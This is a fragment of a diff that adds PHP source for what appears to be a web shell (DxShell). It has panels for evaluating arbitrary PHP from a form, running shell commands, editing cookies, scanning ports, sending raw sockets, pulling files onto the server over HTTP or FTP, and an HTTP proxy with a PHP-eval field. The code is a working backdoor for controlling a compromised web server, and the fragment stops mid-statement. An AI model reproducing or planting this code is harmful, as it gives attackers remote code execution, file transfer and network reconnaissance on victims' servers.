+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';
+	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
